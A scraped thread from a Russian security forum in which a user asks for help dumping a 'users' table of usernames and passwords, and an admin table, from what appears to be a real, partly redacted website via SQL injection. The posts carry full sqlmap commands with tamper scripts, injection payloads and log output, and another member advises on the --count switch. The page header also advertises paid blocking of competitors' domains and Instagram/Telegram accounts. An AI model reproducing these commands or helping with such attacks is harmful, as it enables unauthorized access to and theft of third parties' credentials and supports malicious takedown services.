УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
pls help me

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

12.11.2017, 23:56

rinzing

Guest

Сообщений: n/a

Провел на форуме:
2953

Репутация: 0

hello everybody , i use sqlmap then query and get all name table and name columns for ready ,but when i do a dump :

| item |

| location |

| profile_pic |

| rdreamboard26 |

| refbrgy |

| refcitymun |

| refprovince |

| refregion |

| region |

| reply |

| reply_new |

| sub_category |

| test |

| test2 |

| users

-----------------

and column of Table users

| username

| password

-----------------

so i use dump

sqlmap -u "http:website.com" -D hotgamja -T users --dump --no-cast --flush-session --threads=5 --eta --batch

and

[07:41:26] [INFO] fetching columns for table 'users' in database 'hotgamja'

[07:41:35] [INFO] the SQL query used returns 2 entries

[07:41:35] [INFO] starting 5 threads

[07:45:35] [INFO] fetching entries for table 'users' in database 'hotgamja'

[07:45:35] [WARNING] the SQL query provided does not return any output

[07:45:35] [INFO] fetching number of entries for table 'users' in database 'hotgamja'

[07:45:35] [INFO] retrieved:

[07:45:36] [WARNING] unable to retrieve the number of entries for table 'users' in database 'hotgamja'

[07:45:36] [INFO] fetched data logged to text files under '/root/.sqlmap/output/

and nothing retrieved

so pls help me how can i do it bestter for get access to the data when dump

help me pls icq : 692615965

thank so much

13.11.2017, 10:59

rinzing

Guest

Сообщений: n/a

Провел на форуме:
2953

Репутация: 0

first thank for ur help

and it still this error can not dump columns info bro.(

root@kali:~# sqlmap -u "http://xxxxxx103846" -D hotgamja -T users --dump --no-cast --flush-session --threads=3 --tamper "space2morehash.py" "space2hash.py" "space2mysqlblank.py" "charencode.py" "chardoubleencode.py" "charunicodeencode.py" "percentage.py" --eta --batch --time-sec=10

[07:45:35] [WARNING] the SQL query provided does not return any output

[07:45:35] [INFO] fetching number of entries for table 'users' in database 'hotgamja'

[07:45:35] [INFO] retrieved:

[07:45:36] [WARNING] unable to retrieve the number of entries for table 'users' in database 'hotgamja'

bro can you talk with me by icq?

13.11.2017, 11:55

rinzing

Guest

Сообщений: n/a

Провел на форуме:
2953

Репутация: 0

database dump or tables dump or only columns dump all not get any infomation also bro

[08:26:25] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')

[08:26:25] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'

[08:26:26] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'

[08:26:27] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'

[08:26:35] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'

[08:26:43] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'

[08:26:51] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'

[08:26:58] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'

[08:27:09] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'

[08:27:15] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'

[08:27:25] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'

[08:27:30] [WARNING] parameter length constrainting mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected

GET parameter 'x_code' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N

sqlmap identified the following injection point(s) with a total of 234 HTTP(s) requests:

---

Parameter: x_code (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: b_code=xxxxx1103846' AND 9168=9168 AND 'BDvf'='BDvf

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

Payload: b_code=xxxxx1103846' AND (SELECT 1396 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT (ELT(1396=1396,1))),0x716b787871,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Akmy'='Akmy

---

[08:27:30] [WARNING] changes made by tampering scripts are not included in shown payload content(s)

[08:27:30] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.3.29, Apache 2.2.34

back-end DBMS: MySQL >= 5.0

[08:27:30] [INFO] fetching columns for table 'ADMINMEMBER' in database 'hotgamja'

[08:28:11] [INFO] the SQL query used returns 8 entries

[08:28:11] [INFO] starting 3 threads

[08:30:45] [INFO] fetching entries for table 'ADMINMEMBER' in database 'hotgamja'

[08:30:45] [WARNING] the SQL query provided does not return any output

[08:30:45] [INFO] fetching number of entries for table 'ADMINMEMBER' in database 'hotgamja'

[08:30:45] [INFO] retrieved:

[08:30:46] [WARNING] unable to retrieve the number of entries for table 'ADMINMEMBER' in database 'hotgamja'

[08:30:46] [WARNING] HTTP error codes detected during run:

414 (Request-URI Too Long) - 1 times

[08:30:46] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.xxxxx.com'
[*] shutting down at 08:30:46

root@kali:~#

13.11.2017, 12:47

rinzing

Guest

Сообщений: n/a

Провел на форуме:
2953

Репутация: 0

13.11.2017, 13:59

grimnir

Guest

Сообщений: n/a

Провел на форуме:
216062

Репутация: 231

try with --count cos possible table doesn't have any info

Код:

Code:
Retrieve number of entries for table(s)

Switch: --count

In case that user wants just to know the number of entries in table(s) prior to dumping the desired one, he can use this switch.

Example against a Microsoft SQL Server target:

$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1"\
--count -D testdb
[...]
Database: testdb
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| dbo.users      | 4       |
| dbo.users_blob | 2       |
+----------------+---------+

13.11.2017, 14:17

rinzing

Guest

Сообщений: n/a

Провел на форуме:
2953

Репутация: 0

i need show info when i use sqlmap dump bro

13.11.2017, 14:33

rinzing

Guest

Сообщений: n/a

Провел на форуме:
2953

Репутация: 0

everybody can help me pls(

16.11.2017, 01:13

grimnir

Guest

Сообщений: n/a

Провел на форуме:
216062

Репутация: 231

Did you read previous messages?? There all answers on your questions -try with COUNT parameter ,if this will return 0 means table have no any info

16.11.2017, 09:12

rinzing

Guest

Сообщений: n/a

Провел на форуме:
2953

Репутация: 0

pls help me with full sample command ..

#10

17.11.2017, 09:28

rinzing

Guest

Сообщений: n/a

Провел на форуме:
2953

Репутация: 0

[20:11:11] [INFO] fetching tables for database: 'database'

[20:11:42] [INFO] the SQL query used returns 269 entries

[20:11:56] [INFO] retrieved: AA_test

[20:12:10] [INFO] retrieved: ADDSPEC

[20:12:26] [INFO] retrieved: ADMINMEMBER

check count is working bro

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход